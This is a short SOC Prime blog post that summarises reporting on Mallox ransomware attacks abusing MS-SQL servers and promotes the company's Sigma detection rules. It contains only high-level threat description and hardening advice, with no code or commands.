Cyber defenders have seen a recent increase in cyber attacks distributing Mallox ransomware. Over a period of two years, ransomware operators abused MS-SQL servers as the initial access vector to spread the infection further.
Mallox ransomware detection
With the increasing activity of the Mallox ransomware gang and their ambitions to expand the impact and scope of their attacks, cyber defenders require hyper-responsiveness to stay ahead of the associated threats. By leveraging the SOC Prime platform for collective cyber defense, security teams can equip themselves with innovative tools to detect ransomware attacks faster and more effectively, prioritize their detection and hunting procedures, and future-proof their cybersecurity posture.
To access the full list of Sigma rules for detecting Mallox ransomware, click Explore identifications button. Security engineers can gain insights into the context of the cyber threat, such as ATT&CK and CTI links, and more useful metadata required for threat investigation.
Explore identifications
All of the aforementioned Sigma rules are mapped to the MITER ATT&CK framework and are compatible with cloud-native SIEM and other security solutions. Alternatively, security engineers can apply relevant Sigma rules to identify TargetCompany, FARGO, or Tohnichi, which are other aliases used to identify Mallox ransomware.
Mallox Ransomware Analysis
Unit 42 staff revealed an increase in Mallox ransomware distribution with massive exploitation of MS-SQL servers, growing by more than 150% compared to 2022. In these campaigns, Mallox ransomware operators apply brute force, data extraction and other adversary techniques. Adversaries tend to expand their offensive activities by seeking partners on the dark web and enticing them to join a RaaS partner program.
Mallox ransomware distributors steal data from targeted organizations and then force affected users to pay a ransom by threatening them with leaking the acquired data. They have influenced dozens of organizations from around the world in several industry sectors.
Since Mallox ransomware operators appeared on the cyber threat scene in 2021, they have consistently exploited the same adversary method to penetrate the network by exploiting MS-SQL servers. In the initial attack phase, adversaries perform brute force and then use command-line actions and PowerShell code to remotely download Mallox ransomware strains.
As practical measures aimed at reducing the attack surface, cyber defenders recommend considering the correct configuration of web-facing applications along with any required updates and patches.
Get access to over 650 unique Sigma rules for detecting ransomware attacks to increase your cyber resilience. Get 30+ rules for free or access all detections via On Demand at https://tdm.socprime.com/journey/tdm/.
The post Mallox Ransomware Detection: Increasing Attacks Abusing MS-SQL Servers appeared first on SOC Prime.
